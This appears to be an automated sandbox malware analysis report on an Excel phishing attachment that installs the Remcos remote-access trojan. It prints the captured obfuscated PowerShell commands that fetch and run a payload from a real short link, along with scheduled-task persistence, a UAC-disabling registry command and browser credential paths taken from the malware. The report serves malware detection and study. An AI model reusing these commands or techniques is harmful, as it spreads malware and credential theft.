Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Shipping Document PLBL003534.xls

Overview

General Information

Sample Name:Shipping Document PLBL003534.xls
Analysis ID:336456
MD5:c32cd36c4ac0d06d321422080da164c8
SHA1:ded311853adf3cfc018be4f310bbfba6fcbd0357
SHA256:74cdd5e924e15e451b3201884c8e647061d5d1e3a7e6cb88fccbb7f26878f1e2
Tags:DHLnVpnRATRemcosRATxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Remcos RAT
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files with benign system names
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Injects a PE file into a foreign processes
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2340 cmdline: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2908 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 912 cmdline: cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2904 cmdline: powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2940 cmdline: cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2896 cmdline: powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • sm.exe (PID: 1688 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • schtasks.exe (PID: 2320 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • sm.exe (PID: 260 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 2900 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 752 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 2112 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
            • wscript.exe (PID: 2512 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)
              • cmd.exe (PID: 2344 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
                • remcos.exe (PID: 3032 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
                  • schtasks.exe (PID: 552 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                  • remcos.exe (PID: 1084 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
                  • remcos.exe (PID: 2312 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • remcos.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • remcos.exe (PID: 2108 cmdline: 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • schtasks.exe (PID: 1256 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • remcos.exe (PID: 1744 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • remcos.exe (PID: 2396 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • remcos.exe (PID: 884 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.sm.exe.400000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              18.2.sm.exe.400000.1.unpackRemcos_1Remcos Payloadkevoreilly
              • 0x16510:$name: Remcos
              • 0x16888:$name: Remcos
              • 0x16de0:$name: Remcos
              • 0x16e33:$name: Remcos
              • 0x15674:$time: %02i:%02i:%02i:%03i
              • 0x156fc:$time: %02i:%02i:%02i:%03i
              • 0x16be4:$time: %02i:%02i:%02i:%03i
              • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
              18.2.sm.exe.400000.1.unpackREMCOS_RAT_variantsunknownunknown
              • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
              • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x159e0:$str_b2: Executing file:
              • 0x16798:$str_b3: GetDirectListeningPort
              • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x16534:$str_b5: licence_code.txt
              • 0x1649c:$str_b6: \restart.vbs
              • 0x163c0:$str_b8: \uninstall.vbs
              • 0x1596c:$str_b9: Downloaded file:
              • 0x15998:$str_b10: Downloading file:
              • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
              • 0x159fc:$str_b12: Failed to upload file:
              • 0x167d8:$str_b13: StartForward
              • 0x167bc:$str_b14: StopForward
              • 0x16330:$str_b15: fso.DeleteFile "
              • 0x16394:$str_b16: On Error Resume Next
              • 0x162fc:$str_b17: fso.DeleteFolder "
              • 0x15a14:$str_b18: Uploaded file:
              27.2.remcos.exe.400000.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                27.2.remcos.exe.400000.1.raw.unpackRemcos_1Remcos Payloadkevoreilly
                • 0x16510:$name: Remcos
                • 0x16888:$name: Remcos
                • 0x16de0:$name: Remcos
                • 0x16e33:$name: Remcos
                • 0x15674:$time: %02i:%02i:%02i:%03i
                • 0x156fc:$time: %02i:%02i:%02i:%03i
                • 0x16be4:$time: %02i:%02i:%02i:%03i
                • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
                Click to see the 13 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: RemcosShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, ProcessId: 2312, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat
                Sigma detected: Scheduled temp file as task from temp locationShow sources
                Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\sm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\sm.exe, ParentProcessId: 1688, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', ProcessId: 2320
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), CommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2476, ProcessCommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), ProcessId: 2340

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeReversingLabs: Detection: 13%
                Source: C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exeReversingLabs: Detection: 13%
                Source: C:\Users\user\Documents\sm.exeReversingLabs: Detection: 13%
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: 18.2.sm.exe.400000.1.unpackAvira: Label: BDS/Backdoor.Gen
                Source: 34.2.remcos.exe.400000.1.unpackAvira: Label: BDS/Backdoor.Gen
                Source: 27.2.remcos.exe.400000.1.unpackAvira: Label: BDS/Backdoor.Gen
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_s